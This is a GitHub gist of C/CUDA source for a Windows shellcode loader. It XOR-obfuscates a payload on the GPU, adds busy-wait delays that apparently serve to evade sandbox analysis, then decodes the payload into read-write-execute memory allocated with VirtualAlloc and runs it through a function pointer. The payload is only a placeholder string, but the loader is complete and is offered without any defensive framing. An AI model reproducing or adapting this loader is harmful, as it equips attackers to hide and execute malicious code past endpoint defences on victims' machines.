Skip to content

Instantly share code, notes, and snippets.

@Und3rf10w
Created December 15, 2023 13:35
Show Gist options
  • Save Und3rf10w/446705a409251be3c2a7d4043383a553 to your computer and use it in GitHub Desktop.
Save Und3rf10w/446705a409251be3c2a7d4043383a553 to your computer and use it in GitHub Desktop.
Offloading tasks to CUDA
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
// CUDA runtime
#include <cuda_runtime.h>
__global__ void xorObfuscatePayload(char* data, int len, char key) {
int idx = blockIdx.x * blockDim.x + threadIdx.x;
if (idx < len) {
int clock = 0;
int threshold = (idx + 1) * 123 % 5000 + 1000;
// Dummy operation to consume time
while (clock < threshold) {
clock++;
}
data[idx] ^= key;
}
}
void execute_payload(char *obfuscated_payload, int payload_len, char key) {
// XOR de-obfuscation before execution
for (int i = 0; i < payload_len; ++i) {
int clock = 0;
int delay = (i + 1) * 123 % 5000 + 1000;
// Dummy operation to consume time
while (clock < delay) {
clock++;
}
obfuscated_payload[i] ^= key;
}
// Allocate executable memory
void *exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Copy the payload into the allocated executable memory
memcpy(exec_mem, obfuscated_payload, payload_len);
// Cast the allocated memory to a function pointer
void (*payload_func)() = (void(*)())exec_mem;
// Execute the payload
payload_func();
// Cleanup: de-allocate the memory.
VirtualFree(exec_mem, 0, MEM_RELEASE);
}
int main() {
const char payload[] = "Sensitive payload";
int payloadLength = sizeof(payload);
char key = 0xAB;
char* device_payload;
cudaMalloc((void**)&device_payload, payloadLength);
cudaMemcpy(device_payload, payload, payloadLength, cudaMemcpyHostToDevice);
int threadsPerBlock = 256;
int blocks = (payloadLength + threadsPerBlock - 1) / threadsPerBlock;
xorObfuscatePayload<<<blocks, threadsPerBlock>>>(device_payload, payloadLength, key);
cudaDeviceSynchronize();
char obfuscated_data[payloadLength];
cudaMemcpy(obfuscated_data, device_payload, payloadLength, cudaMemcpyDeviceToHost);
// Execute the payload after obfuscation
execute_payload(obfuscated_data, payloadLength - 1, key); // payloadLength - 1 to exclude the null terminator from execution
cudaFree(device_payload);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment